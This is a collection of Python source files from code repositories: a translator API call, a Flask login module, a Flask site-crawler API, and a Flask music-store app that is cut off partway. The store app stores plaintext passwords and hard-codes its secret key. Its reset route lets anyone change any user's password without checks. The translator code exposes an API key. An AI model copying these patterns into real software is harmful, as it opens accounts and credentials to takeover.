<string xmlns=\"%s\">Hello</string>
<string xmlns=\"%s\">Goodbye</string>
</Texts>
<To>fr-fr</To>
</TranslateArrayRequest>
""" % (ns, ns)
def TranslateArray ():
subscriptionKey = '0dfdfd17470115f2e6ba2026db3b0aa8'
    headers = {
        # per the NOTE above, the key is sent via this header; the original
        # had an obfuscated placeholder in place of the header name
        'Ocp-Apim-Subscription-Key': subscriptionKey,
        'Content-type': 'text/xml'
    }
conn = http.client.HTTPSConnection(host)
conn.request ("POST", path + params, body, headers)
response = conn.getresponse ()
return response.read ()
result = TranslateArray ()
print (result.decode("utf-8"))
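# A sketch for pulling the individual translations out of the XML response
# (assumes the usual ArrayOfstring payload returned by this endpoint):
# import xml.etree.ElementTree as ET
# for node in ET.fromstring(result.decode("utf-8")):
#     print(node.text)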
|
[
"soric.matko@gmail.com"
] |
soric.matko@gmail.com
|
98480ecb3b245791516942cd51aa2d2ac7ba7374
|
895a6bdccb009d4a12d0cf3187f8b7eec8231b98
|
/app/auth/views.py
|
3034125ef4a929ba6398de554fa11b2c40b823eb
|
[] |
no_license
|
luke202001/supervisor_admin_web
|
d1022ddffad6702f3b21a613203c44aa857cdb00
|
176ee2691cb765896b7d05220c666b1c46c88aa4
|
refs/heads/master
| 2020-06-02T22:14:10.866752
| 2017-09-25T03:00:21
| 2017-09-25T03:00:21
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,137
|
py
|
#!/usr/bin/env python
# coding=utf-8
from flask import url_for, redirect, render_template, flash
from flask_login import login_user, login_required, logout_user
from .models import User, singleton_admin
from . import auth
from .forms import LoginForm
from supervisior_lib.supervisor import singleton_supervisor as supervisor
@auth.route("/login", methods=["GET", "POST"])
def login():
form = LoginForm()
if form.validate_on_submit():
username = form.username.data
password = form.password.data
if "admin"== username and singleton_admin.verify_password(password):
login_user(singleton_admin)
return redirect(url_for("home.index"))
else:
flash(u"登录失败", category="error")
return render_template("auth/login.html", form=form)
@auth.route("/logout")
@login_required
def logout():
logout_user()
return redirect(url_for("auth.login"))
from app import login_manager
@login_manager.user_loader
def load_user(user_id):
    user_id = int(user_id)
    if user_id == 0:
return singleton_admin
return User.query.get(user_id)
|
[
"pl01665077@163.com"
] |
pl01665077@163.com
|
2991297e99f021c28cdc081b5e023c710836abb8
|
1234b1ca300661391633438bf231bd80570e1a84
|
/ListTest.py
|
2abc1dc6d67a97a4cf99b528a4abd8e60e4c9212
|
[] |
no_license
|
Taohong01/OCR
|
e70780e4d876142bcfea1711422d58e4d1db3d7d
|
39c798c4947344585d6b644a2d37fb7729b773e6
|
refs/heads/master
| 2020-06-14T17:28:46.822030
| 2017-11-28T04:46:31
| 2017-11-28T04:46:31
| 38,499,317
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 306
|
py
|
# -*- coding: utf-8 -*-
"""
Created on Fri Sep 25 09:30:46 2015
@author: Tao
"""
def extendList(val, list=[]):
list.append(val)
return list
list1 = extendList(10)
list2 = extendList(123,[])
list3 = extendList('a')
print "list1 = %s" % list1
print "list2 = %s" % list2
print "list3 = %s" % list3
|
[
"taohong01@gmail.com"
] |
taohong01@gmail.com
|
962d14a6ac64178dbe6bdf09c2c85a8e1eb29226
|
44ab0c77d7af687b63fb403485f1c5ca39da57ec
|
/backend/blueprints/sites.py
|
3b35604f4d01bcf14af49ab56ff2ec9311990a5e
|
[
"Apache-2.0"
] |
permissive
|
dmitryro/flask-swagger-api
|
22b3387b72880e16d75c523cce385bc0c9574cfb
|
f4449f998e6cd6ec7793304cdeea5c1f870938aa
|
refs/heads/master
| 2022-03-05T04:03:44.751160
| 2020-06-09T03:35:15
| 2020-06-09T03:35:15
| 241,054,587
| 0
| 0
| null | 2022-02-10T22:55:20
| 2020-02-17T08:22:20
|
TypeScript
|
UTF-8
|
Python
| false
| false
| 15,333
|
py
|
#################
#### imports ####
#################
from datetime import datetime
from flask import Blueprint, Flask, json, jsonify, render_template, request, url_for, make_response
from flask import current_app
from flasgger import Swagger
from flask_api import status # HTTP Status Codes
from werkzeug.local import LocalProxy
from worker import celery
import celery.states as states
from models.sites import Site, SiteSchema
from models.sites import Page, PageSchema
from models.actions import Form, FormSchema
from models.actions import FormField, FormFieldSchema
from utils.spide import crawl, internal_urls, get_all_page_forms
from utils.session import obtain_session
sites_blueprint = Blueprint('sites', __name__, template_folder='templates')
logger = LocalProxy(lambda: current_app.logger)
@sites_blueprint.route("/crawled/<int:id>", methods=['GET'])
def get_crawled(id):
"""
Retrieve a single Site
    This endpoint will return a Site based on its id
---
tags:
- Crawled
produces:
- application/json
parameters:
- name: id
in: path
description: ID of site to read crawled pages
type: integer
required: true
responses:
200:
description: Site forms crawled
schema:
$ref: '#/definitions/Site'
404:
description: Site not found
"""
try:
s = obtain_session()
site = s.query(Site).get(id)
host = site.host
port = site.port
        pages = s.query(Page).filter(Page.site_id==id).all()
        site_schema = SiteSchema(many=False)
        form_schema = FormSchema(many=True)
        page_schema = PageSchema(many=True)
        stored_forms = {}
        stored_fields = {}
        # (a stray `pages = []` used to shadow the query result here, so the
        # loop below never ran; an unused `link` was also built from an
        # undefined base_url)
        for page in pages:
forms = s.query(Form).filter(Form.page_id==page.id)
for i, form in enumerate(forms):
stored_fields[f'fields_{page.id}_{i}'] = form.fields
forms_result = form_schema.dump(forms)
stored_forms[f'forms_{page.id}'] = forms_result
pages_result = page_schema.dump(pages)
        for page in pages_result:
            page_id = page.get('id')  # was undefined in the original loop
            forms = stored_forms[f'forms_{page_id}']
            for i, form in enumerate(forms):
                form_id = form.get('id')
                fields = stored_fields[f'fields_{page_id}_{i}']
form['fields'] = fields
page['forms'] = forms
result = site_schema.dump(site)
result['pages'] = pages_result
logger.debug(f"Successfully read the crawled site {id}")
return make_response(jsonify(result), status.HTTP_200_OK)
except Exception as e:
logger.error(f"Error reading the crawled site {id} - {e}")
result = {"error": str(e)}
return make_response(jsonify(result), status.HTTP_500_INTERNAL_SERVER_ERROR)
@sites_blueprint.route("/crawl/<int:id>", methods=['GET'])
def get_elements(id):
"""
Retrieve a single Site
    This endpoint will return a Site based on its id
---
tags:
- Crawl
produces:
- application/json
parameters:
- name: id
in: path
description: ID of site to crawl
type: integer
required: true
responses:
200:
description: Site forms crawled
schema:
$ref: '#/definitions/Site'
404:
description: Site not found
"""
try:
base_url = "https://lovehate.io"
s = obtain_session()
site = s.query(Site).get(id)
host = site.host
port = site.port
site_links = crawl(base_url, max_urls=20)
crawled_pages = list(site_links)
site_schema = SiteSchema(many=False)
form_schema = FormSchema(many=True)
page_schema = PageSchema(many=True)
pages = []
for page in crawled_pages:
p = Page(name=page, site_id=site.id)
s.add(p)
pages.append(p)
s.commit()
s.flush()
stored_forms = {}
stored_fields = {}
for page in pages:
link = f"{base_url}{page.name}"
crawled_forms = get_all_page_forms(link)
forms = []
for i, form in enumerate(crawled_forms):
f = Form(name=form.get('name',''),
method=form.get('method', ''),
action=form.get('action', ''),
form_id=form.get('id',''),
page_id=page.id)
s.add(f)
forms.append(f)
form_id = form.get('form_id')
stored_fields[f'fields_{page.id}_{i}'] = form['fields']
s.commit()
s.flush()
forms_result = form_schema.dump(forms)
stored_forms[f'forms_{page.id}'] = forms_result
stored_forms[f'forms_{page.id}_crawled'] = crawled_forms
pages_result = page_schema.dump(pages)
for page in pages_result:
page_id = page.get('id')
forms = stored_forms[f'forms_{page_id}']
crawled_forms = stored_forms[f'forms_{page_id}_crawled']
for i, form in enumerate(forms):
form_id = form.get('id')
fields = stored_fields[f'fields_{page_id}_{i}']
form['fields'] = fields
page['forms'] = forms
result = site_schema.dump(site)
result['pages'] = pages_result
logger.debug(f"Successfully crawled the site {id}")
return make_response(jsonify(result), status.HTTP_200_OK)
except Exception as e:
logger.error(f"Error crawling the site {id} - {e}")
result = {"error": str(e)}
return make_response(jsonify(result), status.HTTP_500_INTERNAL_SERVER_ERROR)
@sites_blueprint.route("/sites/<int:id>", methods=['GET'])
def get_sites(id):
"""
Retrieve a single Site
    This endpoint will return a Site based on its id
---
tags:
- Sites
produces:
- application/json
parameters:
- name: id
in: path
description: ID of site to retrieve
type: integer
required: true
responses:
200:
description: Site returned
schema:
$ref: '#/definitions/Site'
404:
description: Site not found
"""
try:
logger.debug(f"Reading the site {id} ...")
sess = obtain_session()
site = sess.query(Site).get(id)
logger.debug(f"SITE WAS ----------> {site}")
pages = sess.query(Page).filter(Page.site_id==site.id)
page_schema = PageSchema(many=True)
site_schema = SiteSchema(many=False)
pages_result = page_schema.dump(pages)
result = site_schema.dump(site)
result['pages'] = pages_result
return make_response(jsonify(result), status.HTTP_200_OK)
except Exception as e:
logger.error(f"Error reading the site {id} - {e}")
result = {"error": str(e)}
return make_response(jsonify(result), status.HTTP_500_INTERNAL_SERVER_ERROR)
@sites_blueprint.route("/sites", methods=['POST'])
def create_site():
"""
Creates a Site
This endpoint will create a Site based the data in the body that is posted
---
tags:
- Sites
consumes:
- application/json
produces:
- application/json
parameters:
- in: body
name: body
required: true
schema:
id: site_data
required:
- host
properties:
host:
type: string
description: Site host
port:
type: integer
description: Site port
ga:
type: string
description: Google Analytics
responses:
201:
description: Site created
schema:
$ref: '#/definitions/Site'
400:
description: Bad Request (the posted data was not valid)
"""
try:
data = request.json
ga = data.get("ga", "")
host = data.get("host", "")
port = data.get("port", "80")
site = Site(host=host,
port=int(port),
ga=ga)
base_url = f"https://{host}"
base_url = "https://lovehate.io"
l = []
s = obtain_session()
s.add(site)
s.commit()
site_schema = SiteSchema(many=False)
result = site_schema.dump(site)
logger.debug(f"Saved new site {host} {port}")
return make_response(jsonify(result), status.HTTP_201_CREATED)
except Exception as e:
logger.error(f"Failed saving site - {e}")
result = {"result": "failure"}
return make_response(jsonify(result), status.HTTP_500_INTERNAL_SERVER_ERROR)
@sites_blueprint.route("/sites", methods=['GET'])
def list_sites():
"""
Retrieve a list of Sites
    This endpoint will return all Sites unless a query parameter is specified
---
tags:
- Sites
description: The Sites endpoint allows you to query Sites
definitions:
Site:
type: object
properties:
host:
type: string
description: Host of the site
port:
type: string
description: Port of the site
responses:
200:
description: An array of Sites
schema:
type: array
items:
schema:
$ref: '#/definitions/Site'
"""
logger.debug("Reading the list of all the sites ...")
sess = obtain_session()
all_sites = sess.query(Site).all()
sites_schema = SiteSchema(many=True)
result = sites_schema.dump(all_sites)
return make_response(jsonify(result), status.HTTP_200_OK)
@sites_blueprint.route("/pages/<int:site_id>", methods=['GET'])
def get_pages(site_id):
"""
Retrieve a single Page by Site ID
    This endpoint will return a Page based on its site_id
---
tags:
- Pages
produces:
- application/json
parameters:
- name: site_id
in: path
description: ID of site to retrieve
type: integer
required: true
responses:
200:
description: Site returned
schema:
$ref: '#/definitions/Page'
404:
description: Site not found
"""
logger.debug(f"Reading the list of pages for site id {site_id}...")
sess = obtain_session()
pages = sess.query(Page).filter_by(site_id=site_id)
page_schema = PageSchema(many=True)
result = page_schema.dump(pages)
return make_response(jsonify(result), status.HTTP_200_OK)
@sites_blueprint.route("/pages", methods=['GET'])
def list_pages():
"""
Retrieve a list of Pages
    This endpoint will return all Pages unless a query parameter is specified
---
tags:
- Pages
    description: The Pages endpoint allows you to query Pages
    definitions:
      Page:
type: object
properties:
name:
type: string
description: Page name
meta:
type: string
description: Page meta
headers:
type: string
description: Page headers
site_id:
type: integer
description: Site ID
responses:
200:
        description: An array of Pages
schema:
type: array
items:
schema:
$ref: '#/definitions/Page'
"""
logger.debug("Reading the list of all pages ...")
sess = obtain_session()
all_pages = sess.query(Page).all()
pages_schema = PageSchema(many=True)
result = pages_schema.dump(all_pages)
return make_response(jsonify(result), status.HTTP_200_OK)
@sites_blueprint.route("/sites/<int:id>", methods=['DELETE'])
def delete_site(id):
"""
Delete a Site
This endpoint will delete a Site based the id specified in the path
---
tags:
- Sites
description: Deletes a Site from the database
parameters:
- name: id
in: path
description: ID of site to delete
type: integer
required: true
responses:
204:
description: Site deleted
"""
try:
sess = obtain_session()
site = sess.query(Site).get(id)
logger.debug(f"Deleting site {id} ...")
if site:
sess.delete(site)
sess.commit()
sess.flush()
result = {"result": "success"}
return make_response(jsonify(result), status.HTTP_204_NO_CONTENT)
except Exception as e:
logger.error(f"Error deleting the site {id} - {e}")
result = {"result": "failure"}
return make_response(jsonify(result), status.HTTP_500_INTERNAL_SERVER_ERROR)
@sites_blueprint.route("/forms", methods=['GET'])
def list_forms():
"""
Retrieve a list of Forms
    This endpoint will return all Forms unless a query parameter is specified
---
tags:
- Forms
    description: The Forms endpoint allows you to query Forms
definitions:
Form:
type: object
properties:
id:
type: integer
description: Form id
action:
type: string
            description: Form action
method:
type: string
description: Method (POST/GET/PUT)
form_id:
type: string
description: Form text ID
name:
type: string
description: Form name
page_id:
type: integer
description: Page ID
responses:
200:
        description: An array of Forms
schema:
type: array
items:
schema:
$ref: '#/definitions/Form'
"""
logger.debug("Reading the list of forms ...")
sess = obtain_session()
all_forms = sess.query(Form).all()
forms_schema = FormSchema(many=True)
result = forms_schema.dump(all_forms)
return make_response(jsonify(result), status.HTTP_200_OK)
@sites_blueprint.route("/forms/<int:page_id>", methods=['GET'])
def get_forms(page_id):
"""
Retrieve a single Form by Page ID
    This endpoint will return a Form based on its page_id
---
tags:
- Forms
produces:
- application/json
parameters:
- name: page_id
in: path
description: ID of site to retrieve
type: integer
required: true
responses:
200:
description: Form returned
schema:
$ref: '#/definitions/Form'
404:
description: Page not found
"""
try:
logger.debug(f"Reading the list of forms for page {page_id} ...")
sess = obtain_session()
forms = sess.query(Form).filter_by(page_id=page_id)
form_schema = FormSchema(many=True)
result = form_schema.dump(forms)
return make_response(jsonify(result), status.HTTP_200_OK)
except Exception as e:
logger.error(f"Error reading forms for page {page_id} - {e}")
result = {"result": "failure"}
return make_response(jsonify(result), status.HTTP_500_INTERNAL_SERVER_ERROR)
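# Registration sketch (assuming an application factory elsewhere creates
# the Flask app; this is illustrative, not part of the original module):
# from flask import Flask
# app = Flask(__name__)
# app.register_blueprint(sites_blueprint)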
|
[
"dmitryro@gmail.com"
] |
dmitryro@gmail.com
|
81e6a5da98a24959afbf6675d09f710eb53bf804
|
ec5e752eea3fa9becb613a4b71e5a49066536df4
|
/Play-ON/store.py
|
1d27f0ffa7ed87324aeb1fd8470341d9eeced01c
|
[] |
no_license
|
Yeshwanth-1985/play-on
|
eab0afdaebdf43d1dd95e0491635168808f53940
|
2cbc929f2b727a005ecf09a7a7a1cccfeed38ae2
|
refs/heads/master
| 2023-06-11T02:08:28.534677
| 2021-07-03T13:33:55
| 2021-07-03T13:33:55
| 376,204,894
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 33,503
|
py
|
from flask import Flask, render_template, request, session, redirect, url_for
from flask_sqlalchemy import SQLAlchemy
from sqlalchemy import or_
from flask_mail import Mail
from werkzeug.utils import secure_filename
from datetime import datetime
import json
import math
import os
import re
local_server = True
with open("config.json", "r") as c:
params = json.load(c)["params"]
app = Flask(__name__)
app.config['UPLOAD_FOLDER'] = params["upload_location"]
app.config['song_folder'] = params["song_folder"]
app.config['image_folder'] = params["image_folder"]
app.config['UPLOAD_EXTENSIONS'] = ['.mp3']
app.secret_key = 'super_secret_key'
app.config.update(
MAIL_SERVER="smtp.gmail.com",
MAIL_PORT="465",
MAIL_USE_SSL=True,
MAIL_USERNAME=params["gmail_username"],
MAIL_PASSWORD=params["gmail_password"]
)
mail = Mail(app)
if(local_server):
app.config["SQLALCHEMY_DATABASE_URI"] = params["local_uri"]
else:
app.config["SQLALCHEMY_DATABASE_URI"] = params["prod_uri"]
db = SQLAlchemy(app)
class Songs(db.Model):
sid = db.Column(db.Integer, primary_key=True)
song_name = db.Column(db.String(20), nullable=False)
movie_name = db.Column(db.String(30), nullable=False)
genre = db.Column(db.String(20), nullable=False)
song_lyrics= db.Column(db.String(1000), nullable=False)
slug = db.Column(db.String(20), nullable=False)
song_location = db.Column(db.String(20), nullable=False)
image_location = db.Column(db.String(30), nullable=False)
class Admins(db.Model):
admin_no = db.Column(db.Integer, primary_key=True)
admin_fullname = db.Column(db.String(20), nullable=False)
admin_username = db.Column(db.String(20), nullable=False)
admin_email = db.Column(db.String(30), nullable=False)
admin_password = db.Column(db.String(20), nullable=False)
admin_dob = db.Column(db.Date, nullable=False)
admin_gender = db.Column(db.String(10), nullable=False)
class Contact(db.Model):
sno = db.Column(db.Integer, primary_key=True)
name = db.Column(db.String(20), nullable=False)
email = db.Column(db.String(20), nullable=False)
phone_num = db.Column(db.String(12), nullable=False)
mes = db.Column(db.String(120), nullable=False)
date = db.Column(db.String(50), nullable=True)
class Users(db.Model):
uid = db.Column(db.Integer, primary_key=True)
fullname=db.Column(db.String(20), nullable=False)
email = db.Column(db.String(30), nullable=False)
username = db.Column(db.String(20), nullable=False)
password = db.Column(db.String(20), nullable=False)
gender = db.Column(db.String(10), nullable=False)
dob = db.Column(db.Date, nullable=False)
class Song_trivia(db.Model):
sid = db.Column(db.Integer, primary_key=True)
song_name=db.Column(db.String(30), nullable=False)
singers_name = db.Column(db.String(40), nullable=False)
music_director = db.Column(db.String(20), nullable=False)
lyricist = db.Column(db.String(20), nullable=False)
usersongs = {}
activeusers = {}
temp = []
adminsongs = []
adminsusers = {}
@app.route("/")
def home():
return render_template("main.html", params=params, username='')
@app.route("/reset/<string:username>", methods = ['GET', 'POST'])
def reset(username):
if request.method == 'POST':
password = request.form.get('password')
repassword = request.form.get('repassword')
if password != repassword:
return render_template("reset.html", username=username, params=params, message="Entered passwords does not match")
user = Users.query.filter_by(username=username).first()
user.password = password
session[username] = username
activeusers[username] = username
db.session.commit()
return redirect("/songs/"+username)
return render_template("reset.html", params=params, message="Reset your password", username=username)
@app.route("/forgotpass", methods =['GET', 'POST'])
def recover():
if request.method == 'POST':
username = request.form.get('username')
email = request.form.get('email')
dob = request.form.get('dob')
user = Users.query.filter_by(username=username).first()
if not user:
return render_template("recover.html", params=params, message="Username not found")
if (user.email == email) and (str(user.dob) == dob):
return redirect("/reset/"+username)
return render_template("recover.html", params=params, message="Provided Details doesnot match with the database")
return render_template("recover.html", params=params, message="Enter your details to reset the password")
@app.route("/songs/<string:username>")
def all(username):
if username in session and username in activeusers:
return render_template("userhome.html", params=params, username=username)
return redirect("/")
@app.route("/searchname/<string:username>/<int:page>", methods=['GET', 'POST'])
def searchname(username,page):
if username in session and username in activeusers:
if request.method == 'POST':
category = request.form.get('category')
keyword = request.form.get('keyword')
if category == "movie":
key = "%{0}%".format(keyword)
results = Songs.query.filter(Songs.movie_name.like(key)).all()
elif category == "song":
key = "%{0}%".format(keyword)
results = Songs.query.filter(Songs.song_name.like(key)).all()
elif category == "lyrics":
key = "%{0}%".format(keyword)
results = Songs.query.filter(Songs.song_lyrics.like(key)).all()
else:
key = "%{0}%".format(keyword)
                ids = []  # avoid shadowing the builtin list
                details = Song_trivia.query.with_entities(Song_trivia.sid).filter(or_(Song_trivia.singers_name.like(key), Song_trivia.music_director.like(key),Song_trivia.lyricist.like(key))).all()
                for detail in details:
                    ids.append(int(detail[0]))
                results = Songs.query.filter(Songs.sid.in_(ids)).all()
temp.append(results)
if (len(results) <= int(params["no_of_posts"])):
prev = "1"
next = "1"
else:
last = math.ceil(len(results) / int(params["no_of_posts"]))
page = int(page)
results = results[(page - 1) * int(params["no_of_posts"]): (page - 1) * int(params["no_of_posts"]) + int(params["no_of_posts"])]
if (page == 1):
prev = last
next = str(page + 1)
elif (page == last):
prev = str(page - 1)
next = "1"
else:
prev = str(page - 1)
next = str(page + 1)
usersongs[username] = []
usersongs[username].append(results)
return render_template("usersongs.html", check2="hiii", genre="Searched Songs", params=params, songs=results,prev=prev, next=next, username=username)
results = temp[len(temp)-1]
if (len(results) <= int(params["no_of_posts"])):
prev = "1"
next = "1"
else:
last = math.ceil(len(results) / int(params["no_of_posts"]))
page = int(page)
results = results[(page - 1) * int(params["no_of_posts"]): (page - 1) * int(params["no_of_posts"]) + int(
params["no_of_posts"])]
if (page == 1):
prev = last
next = str(page + 1)
elif (page == last):
prev = str(page - 1)
next = "1"
else:
prev = str(page - 1)
next = str(page + 1)
usersongs[username] = []
usersongs[username].append(results)
return render_template("usersongs.html", check2="hiii", genre="Searched Songs", params=params, songs=results,prev=prev, next=next, username=username)
return redirect("/")
@app.route("/songtrivia/<string:username>/<int:sid>")
def songtrivia(username,sid):
if username in session:
song = Songs.query.filter_by(sid=sid).first()
trivia = Song_trivia.query.filter_by(sid=sid).first()
return render_template("trivia.html", params=params, username=username, song=song, trivia=trivia)
return redirect("/")
@app.route("/list/<string:username>/others")
def otherlist(username):
if username in session and username in activeusers:
return render_template("userhomenext.html", params=params, username=username)
return redirect("/")
@app.route("/otherlist/<string:username>/<string:person>/<int:page>")
def otherlistsongs(username,person,page):
if username in session and username in activeusers:
        ids = []  # avoid shadowing the builtin list
        key = "%{0}%".format(person)
        details = Song_trivia.query.with_entities(Song_trivia.sid).filter(or_(Song_trivia.singers_name.like(key),Song_trivia.music_director.like(key),Song_trivia.lyricist.like(key))).all()
        for detail in details:
            ids.append(int(detail[0]))
        results = Songs.query.filter(Songs.sid.in_(ids)).all()
if (len(results) <= int(params["no_of_posts"])):
prev = "1"
next = "1"
else:
last = math.ceil(len(results) / int(params["no_of_posts"]))
page = int(page)
results = results[(page - 1) * int(params["no_of_posts"]): (page - 1) * int(params["no_of_posts"]) + int(
params["no_of_posts"])]
if (page == 1):
prev = last
next = str(page + 1)
elif (page == last):
prev = str(page - 1)
next = "1"
else:
prev = str(page - 1)
next = str(page + 1)
usersongs[username] = []
usersongs[username].append(results)
return render_template("usersongs.html", check="hiii",params=params, genre=person, songs=results, prev=prev, next=next,username=username)
return redirect("/")
@app.route("/list/<string:username>/<string:genre>/<int:page>")
def songlist(username,genre,page):
if username in session and username in activeusers:
key = "%{0}%".format(genre)
results = Songs.query.filter(Songs.genre.like(key)).all()
if(len(results) <= int(params["no_of_posts"])):
prev="1"
next="1"
else:
last = math.ceil(len(results) / int(params["no_of_posts"]))
page = int(page)
results = results[(page - 1) * int(params["no_of_posts"]): (page - 1) * int(params["no_of_posts"]) + int(params["no_of_posts"])]
if (page == 1):
prev = last
next = str(page + 1)
elif (page == last):
prev = str(page - 1)
next = "1"
else:
prev = str(page - 1)
next = str(page + 1)
usersongs[username] = []
usersongs[username].append(results)
return render_template("usersongs.html", params=params, genre=genre, songs=results, prev=prev, next=next, username=username)
return redirect("/")
@app.route("/play/<string:username>/<string:sid>")
def play(username,sid):
if username in session and username in activeusers:
return render_template("player.html", index=sid, listlen=len(usersongs[username][0]), params=params, songs=usersongs[username][0], username=username)
return redirect("/")
@app.route("/registeruser", methods=['GET', 'POST'])
def register():
params["registermes"] = "enter your details for registration"
if request.method == 'POST':
fullname= request.form.get('fullname')
email = request.form.get('email')
username = request.form.get('username')
password = request.form.get('password')
gender = request.form.get('gender')
dob = request.form.get('dob')
repassword = request.form.get('repassword')
username = username.strip()
if Users.query.filter_by(username=username).first() or Admins.query.filter_by(admin_username=username).first():
params["registermes"] = "username already exists, try another username"
return render_template("register.html", params=params)
elif Users.query.filter_by(email=email).first() or Admins.query.filter_by(admin_email=email).first():
params["registermes"] = "email already registered, try another email"
return render_template("register.html", params=params)
elif password!=repassword:
params["registermes"] = "entered passwords doesn't match, kindly recheck"
return render_template("register.html", params=params)
else:
user = Users(fullname=fullname, email=email, username=username, password=password, gender=gender, dob=dob)
db.session.add(user)
db.session.commit()
session[username] = username
activeusers[username] = username
params["registermes"] = "Succesfully registered"
return redirect('/songs/' + username)
return render_template("register.html", params=params)
@app.route("/user", methods=['GET', 'POST'])
def user():
params["mes"] = "enter your details for login"
if request.method == 'POST':
username = request.form.get('username')
password = request.form.get('password')
username=username.strip()
if '@' in username and '.com' in username:
if not Users.query.filter_by(email=username).first():
params["mes"] = "account not found"
render_template("userform.html", params=params)
elif not Users.query.filter_by(email=username, password=password).first():
params["mes"] = "username and password doesnt match"
render_template("userform.html", params=params)
else:
details=Users.query.with_entities(Users.username).filter(Users.email==username).all()
username=details[0][0]
session[username] = username
activeusers[username] = username
return redirect('/songs/' + username)
else:
if not Users.query.filter_by(username=username).first():
params["mes"] = "account not found"
render_template("userform.html", params=params)
elif not Users.query.filter_by(username=username, password=password).first():
params["mes"] = "username and password doesnt match"
render_template("userform.html", params=params)
else:
session[username] = username
activeusers[username] = username
return redirect('/songs/' + username)
return render_template("userform.html", params=params)
@app.route("/logout/<string:username>")
def logout(username):
if username in session and username in activeusers:
session.pop(username)
activeusers.pop(username)
return redirect("/")
return redirect("/")
@app.route("/deactivate/<string:username>")
def deactivate(username):
if username in session and username in activeusers:
user = Users.query.filter_by(username=username).first()
session.pop(username)
activeusers.pop(username)
db.session.delete(user)
db.session.commit()
return redirect("/")
return redirect("/")
@app.route("/password/<string:username>")
def password(username):
if username in session and username in activeusers:
return render_template("password.html", params=params, username=username, message="Enter the details")
return redirect("/")
@app.route("/profile/<string:username>")
def profile(username):
if username in session and username in activeusers:
user = Users.query.filter_by(username=username).first()
return render_template("profile.html", params=params, username=username, user=user)
return redirect("/")
@app.route("/changepass/<string:username>", methods=['GET', 'POST'])
def changepass(username):
if username in session and username in activeusers:
currentpassword=request.form.get('currentpassword')
newpassword = request.form.get('newpassword')
renewpassword = request.form.get('renewpassword')
if Users.query.filter_by(username=username, password=currentpassword).first():
if newpassword==renewpassword:
user = Users.query.filter_by(username=username).first()
user.password = renewpassword
db.session.commit()
return render_template("password.html", params=params, username=username, message="Password succesfully changed")
return render_template("password.html", params=params, username=username, message="Entered New Password does not match with confirm new password, please recorrect")
return render_template("password.html", params=params, username=username, message="Current password does not with the password in our database")
return redirect("/")
@app.route("/delete/<string:adminname>/<string:sid>", methods=['GET', 'POST'])
def delete(adminname,sid):
if (adminname in session and adminname in adminsusers):
song = Songs.query.filter_by(sid=sid).first()
db.session.delete(song)
db.session.commit()
return redirect("/songdetails/"+adminname)
return redirect("/")
@app.route("/adminlogin", methods=['GET', 'POST'])
def adminlogin():
if request.method == 'POST':
params["registermes"] = "enter your details for login"
adminname = request.form.get('adminname')
password = request.form.get('admin_password')
if '@' in adminname and '.com' in adminname:
if not Admins.query.filter_by(admin_email=adminname).first():
params["mes"] = "account not found"
render_template("adminlogin.html", params=params)
elif not Admins.query.filter_by(admin_email=adminname, admin_password=password).first():
params["mes"] = "username and password does not match"
render_template("adminlogin.html", params=params)
else:
details = Admins.query.with_entities(Admins.admin_username).filter(Admins.admin_email == adminname).all()
adminname = details[0][0]
session[adminname] = adminname
adminsusers[adminname] = adminname
return redirect('/dashboard/' + adminname)
else:
if not Admins.query.filter_by(admin_username=adminname).first():
params["mes"] = "account not found"
render_template("adminlogin.html", params=params)
elif not Admins.query.filter_by(admin_username=adminname, admin_password=password).first():
params["mes"] = "username and password does not match"
render_template("adminlogin.html", params=params)
else:
session[adminname] = adminname
adminsusers[adminname] = adminname
return redirect('/dashboard/' + adminname)
return render_template("adminlogin.html", params=params)
@app.route("/adminpassword/<string:adminname>", methods=['GET', 'POST'])
def adminpass(adminname):
if adminname in session and adminname in adminsusers:
if request.method == "POST":
currentpassword=request.form.get('currentpassword')
newpassword = request.form.get('newpassword')
renewpassword = request.form.get('renewpassword')
if Admins.query.filter_by(admin_username=adminname, admin_password=currentpassword).first():
if newpassword==renewpassword:
admin = Admins.query.filter_by(admin_username=adminname).first()
admin.admin_password = renewpassword
db.session.commit()
return render_template("adminpassword.html", params=params, adminname=adminname, message="Password succesfully changed")
return render_template("adminpassword.html", params=params, adminname=adminname, message="Entered New Password does not match with confirm new password, please recorrect")
return render_template("adminpassword.html", params=params, adminname=adminname, message="Current password does not with the password in our database")
return render_template("adminpassword.html", params=params, adminname=adminname, message="enter the details")
return redirect("/adminlogin")
@app.route("/dashboard/<string:adminname>", methods=['GET', 'POST'])
def dashboard(adminname):
if (adminname in session and adminname in adminsusers):
adminsongs = Songs.query.all()
adminusers = Users.query.all()
adminmessages = Contact.query.all()
admindetails = Admins.query.all()
return render_template("dashboard.html",adminscount = len(admindetails), userscount=len(adminusers), activeusers=len(activeusers), totalsongs=len(adminsongs), messagescount=len(adminmessages), params=params, adminname=adminname)
return render_template("adminlogin.html", params=params)
@app.route("/userdetails/<string:adminname>")
def userdetails(adminname):
if (adminname in session and adminname in adminsusers):
list = []
for acuser in activeusers:
print(acuser)
list.append(acuser)
print(list)
results = Users.query.filter(Users.username.in_(list)).all()
print(results)
adminusers = Users.query.all()
return render_template("userdetails.html", adminname=adminname, acusers=results, users=adminusers, params=params)
return redirect("/adminlogin")
@app.route("/songdetails/<string:adminname>", methods=["GET","POST"])
def songdetails(adminname):
if (adminname in session and adminname in adminsusers):
if request.method == 'POST':
category = request.form.get('category')
keyword = request.form.get('keyword')
if category == "movie":
key = "%{0}%".format(keyword)
adminsongs = Songs.query.filter(Songs.movie_name.like(key)).all()
elif category == "song":
key = "%{0}%".format(keyword)
adminsongs = Songs.query.filter(Songs.song_name.like(key)).all()
elif category == "lyrics":
key = "%{0}%".format(keyword)
adminsongs = Songs.query.filter(Songs.song_lyrics.like(key)).all()
            else:
                key = "%{0}%".format(keyword)
                # the original called list.append on the builtin without ever
                # creating a list; collect the ids in a local instead
                ids = []
                details = Song_trivia.query.with_entities(Song_trivia.sid).filter(or_(Song_trivia.singers_name.like(key), Song_trivia.music_director.like(key),Song_trivia.lyricist.like(key))).all()
                for detail in details:
                    ids.append(int(detail[0]))
                adminsongs = Songs.query.filter(Songs.sid.in_(ids)).all()
return render_template("songdetails.html", adminname=adminname, songs=adminsongs, params=params)
adminsongs = Songs.query.all()
return render_template("songdetails.html", adminname=adminname, songs=adminsongs, params=params)
return redirect("/adminlogin")
@app.route("/usermessages/<string:adminname>")
def messagedetails(adminname):
if (adminname in session and adminname in adminsusers):
